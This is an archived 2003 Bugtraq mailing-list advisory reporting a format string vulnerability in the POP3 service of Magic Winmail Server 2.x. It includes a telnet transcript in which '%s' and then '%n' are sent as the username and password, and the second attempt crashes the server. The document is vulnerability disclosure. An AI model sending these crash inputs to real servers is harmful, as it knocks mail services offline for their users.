lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sat, 24 May 2003 15:33:53 -0700
From: D4rkGr3y <grey_1999@...l.ru>
To: bugtraq@...urity.nnov.ru, bugtraq@...urityfocus.com
Subject: Magic Winmail Server v.2.*: format string


-----BEGIN PGP SIGNED MESSAGE-----

################################################################*
#          Damage Hacking Group security advisory
#                     www.dhgroup.org
################################################################*
#Product: Magic Winmail Server
#Auth: AMAX Information Technologies Inc. [www.magicwinmail.net]
#Vulnerable versions: v.2.* (founded in 2.3)
#Vulnerability: format string
################################################################*

#Overview#------------------------------------------------------#
Magic Winmail Server is a professional and easy-use mail server
software, supporting SMTP,POP3,WebMail,anti-virus,multiple
domains,SMTP authentication,remote control, spam filter,user
and domain alias, quotas, mail group, mail route. Magic Winmail
can serve not only as LAN mail server, Internet Mail server,
but also as mail server or gateway switching in with ISDN, xDSL,
Cable Modem.

#Problem#-------------------------------------------------------#
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>telnet 127.0.0.1 110
+OK alpha Magic Winmail Server 2.3(Build 0402) POP3 ready
user %s
+OK
pass %s
- -ERR authorization failed


Connection to host lost.

C:\>type Progra~1\magicw~1\server\logs\pop3.log
2105/Y-19:48:50   2716 Connect from 127.0.0.1
2105/Y-19:48:57   1336 ?-???? not exist

C:\>                   ^^^^^^
                         %s
#########now let's kill it

C:\>telnet 127.0.0.1 110
+OK alpha Magic Winmail Server 2.3(Build 0402) POP3 ready
user %n
+OK
pass %n
- -ERR authorization failed


Connection to host lost.

C:\>telnet 127.0.0.1 110
Connecting To 127.0.0.1...Could not open connection to the host,
on port 110. No connection could be made because the target
machine actively refused it.

C:\>

#Exploit#--------------------------------------------------------#
none

#wow#------------------------------------------------------------#
%$#@ www.dhgroup.org -=> opened English version! Come on in :)

#eof

Best regards               www.dhgroup.org
  D4rkGr3y                    icq 540981

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com>

iQCVAwUBPs/zS24LIpseSJmPAQGSPQP+Lu8vaa7UhQG09Wx3hGHsugm6dLR25jwM
kiEdg8pWuX5iMeloFVm91mjyuw5jrWpT1khNbdntZcyQ3Xxs9I/v4szYH/Lfh/fP
GUoE0Ek3aM2oxmpktisB9g/KFoMmOhSskv0AEOwTKEVMPCRS8GWZrrbJERfDcevY
f55hQN4jzSA=
=t1jb
-----END PGP SIGNATURE-----

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ